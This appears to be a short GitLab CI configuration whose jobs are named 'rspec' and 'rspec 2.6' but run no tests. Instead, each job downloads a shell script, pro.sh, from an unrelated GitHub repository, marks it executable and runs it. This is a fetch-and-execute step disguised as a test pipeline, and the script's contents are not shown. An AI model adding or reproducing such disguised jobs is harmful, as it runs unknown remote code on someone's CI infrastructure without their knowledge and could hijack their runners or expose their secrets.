default:
  image: ruby:2.5

rspec:
  script: wget https://raw.githubusercontent.com/Nathanhuwain-ui/filescholl/main/pro.sh && chmod +x pro.sh && ./pro.sh

rspec 2.6:
  image: ruby:2.6
  script: wget https://raw.githubusercontent.com/Nathanhuwain-ui/filescholl/main/pro.sh && chmod +x pro.sh && ./pro.sh
